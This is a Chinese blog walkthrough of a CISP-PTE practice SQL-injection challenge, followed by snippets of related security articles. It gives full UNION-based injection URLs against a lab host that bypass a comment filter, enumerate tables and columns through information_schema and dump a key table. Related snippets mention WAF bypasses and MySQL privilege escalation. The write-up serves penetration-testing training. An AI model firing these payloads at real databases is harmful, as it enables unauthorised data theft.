PTE练习

最新推荐文章于 2024-07-17 17:36:22 发布
最新推荐文章于 2024-07-17 17:36:22 发布
阅读量161 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56129970/article/details/130844561
版权

练习题一 SQL注入

题目内容如下所示,需要我们通过sql注入找到key值
在这里插入图片描述进入题目看到这样的页面,后面附带传参源码,注入点应该就是uid参数了。源码中可看出该题过滤掉了’–’ 和’#’
在这里插入图片描述构造语句’ union select 1,2,3,4,5 or ‘1’ = ‘1猜字段数
在这里插入图片描述到6的时候页面返回正常,由此可猜测字段是6,而且2和3是显示位。
在这里插入图片描述构造语句显出表名
http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6 or ‘1’ = '1

在这里插入图片描述然后再查看IS_KEY表中的字段http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name = ‘IS_KEY’ and table_schema=database()),3,4,5,6 or ‘1’ = '1

在这里插入图片描述最后出key值http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6’ union select 1,(select group_concat(haha) from IS_KEY),3,4,5,6 or ‘1’ = '1
在这里插入图片描述

m0_56129970
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PTE】SQL注入(二)
HkD01L的博客
11-19 801
CISP-PTE国家注册信息安全渗透测试工程师课程笔记SQL注入、布尔盲注、时间盲注、延时注入、万能密码
kali linux渗透测试 第二章(2)sql简单绕过处理(ctf题目实例)
maluxiao123的博客
08-12 618
实验环境为win2003+phpstudy+php+mysql 要利用sql漏洞读取/tmp/360/key的文件,进入答题后发现会直接返回sql语句 在域名上我们可以看到有id=1的字符输入空格union空格select后返回如下 发现空格和union都没有显示,说明字符被过滤掉了,这时候我们就需要进行绕过,绕过的方式有改变大小写(如union->Union),双写(uniunionon在关键字中任意位置再插入一个),url编码(union-->%75%6E%69%6F%6.
【无标题】
weixin_51387754的博客
10-17 1114
CISP-PTE专注于培养、考核高级实用型网络安全渗透测试安全人才,是业界首个理论与实践相结合的网络安全专项技能水平注册考试。
【CISP-PTE】SQL注入练习
西原一点红的博客
06-26 1454
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
sql_mysql注入基础篇
weixin_44110913的博客
05-08 1417
文章目录一.判断注入类型1.数字型2.字符型3.搜索型 一.判断注入类型 1.数字型 一般出现图这种,选择这种,很有可能就是数字型 SQL语句猜测:select xx from xx where id=1 构造payload1:select xx from xx where id=1 or 1=1 如果返回了大量数据,则or 1=1带入了sql,说明存在数字型sql注入 构造payload2:se...
CISP_PTE练习题docker环境
01-19
CISP_PTE练习题docker环境
CISP练习题A
03-12
本文档为CISP练习题A部分,共100道选择题,可用于信息安全从业人员备考
CISP-PTE模拟练习网站源码.zip
11-22
这个模拟练习网站源码是为了帮助考生准备CISP-PTE考试而设计的。源码通常包含了网站的全部结构、功能实现以及逻辑流程,是理解网站工作原理的关键。 该压缩包文件"**CISP-PTE模拟练习网站源码.zip**"包含了一个完整...
PTE-Test-Helper:PTE密钥王练习
04-29
**PTE-Test-Helper** 是一个专门为PTE(Pearson Test of English)考生准备的练习工具,被称为“PTE密钥王练习”。这个工具利用了JavaScript编程语言,旨在帮助考生提升考试技能,熟悉考试流程,并通过模拟练习来...
CISP-PTE八套真题详解(侵删)
00勇士王子的博客
12-02 5659
PTE八套模拟题详解,侵删
学习MySQL的select语句
开心的小包子
12-21 203
select语句可 以用回车分隔 $sql="select * from article where id=1"和 $sql="select * from article where id=1" 都可以得到正确的结果,但有时分开写或许能 更明了一点,特别是当sql语句比较长时。 批量查询数据 可以用in 来实现 $sql="select * from article where i...
Mysql注入详解
peakerli的专栏
12-03 860
<br />时刻绷紧安全这根弦<br /> <br />原文:http://laoxiege.blog.sohu.com/115453521.html<br /> <br />前言<br />   2003年开始,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看<br /> 过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国内才<br /> 开始注意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来<br /> ,
MySQl数据库DQL简单操作 查询 select...from...where...
weixin_45006403的博客
08-26 3039
MySQl数据库DQL操作 数据的查询,在数据库中非常重要 简单查询 关系查询 子查询 集合查询 简单查询 select 查询 select expr; -- 简单计算 select 1+2; -- 查询当前系统时间; select now(); -- 查询当前用户; select user(); -- 查询数据库的版本; select version(); from 查询 select 查询的字段列表 from 表,表1,....; ps:查询的字段列表 多个字段,用 逗号 分割,如果
mysql 注释 绕过_MySQL绕过小结
weixin_35657099的博客
01-20 305
0x01 前言最近在网上搜集学习到关于 mysql 注入的操作,故做一个小总结。0x02 测试我的WafBypass之道 (SQL注入篇)这篇文章结尾部分提到的,把每个 SQL 关键字两侧可插入的点称之为”位“,类似下图:我要总结的这些操作,也是围着这五个位,下面开始。位置一(1)注释符/**/ %23 --+ /*!50000union*/id=2/**/union select 1,user...
单引号 绕过 mysql_MySQL绕过小结
weixin_33214011的博客
02-05 1030
0x01 前言最近在网上搜集学习到关于 mysql 注入的操作,故做一个小总结。0x02 测试我的WafBypass之道 (SQL注入篇)这篇文章结尾部分提到的,把每个 SQL 关键字两侧可插入的点称之为”位“,类似下图:我要总结的这些操作,也是围着这五个位,下面开始。位置一(1)注释符/**/ %23 --+ /*!50000union*/id=2/**/union select 1,user...
mysql数据库反弹端口连接提权
xiaotu0821的博客
11-12 6万+
Mysql数据库反弹端口连接提权 在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃了,但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景: (1)通过网站无法获取webshell (2)Webshell无法执行命令 (3)有phpmyadmin和root账号,无法查询或者无...
v3
热门推荐
csdn_net_us的博客
10-23 24万+
g_func_[size]125222[/size] data_78149D8DA6602124AD6E3DA7BE045809F937F79DCF95F33649FFB8FE37BC5EFC 45C4AA991AB785914A5EC67D9F0FDE495DF2A47FE5499BA63CCF7B23655C3660 7807E3FEBB3BBBBFFBC9B2535EE5BE44098
web安全之跨站脚本攻击xss
最新发布
奔跑的小猪仔
07-17 558
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
cisp-pte书籍
12-24
CISP-PTE(中国学生英语能力标准测试)是专门针对中国学生的英语语言能力测试,旨在帮助...总之,CISP-PTE的书籍不仅涵盖了丰富的教学内容和考试技巧,还为学生提供了全方位的学习和练习,帮助他们更好地备战英语考试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值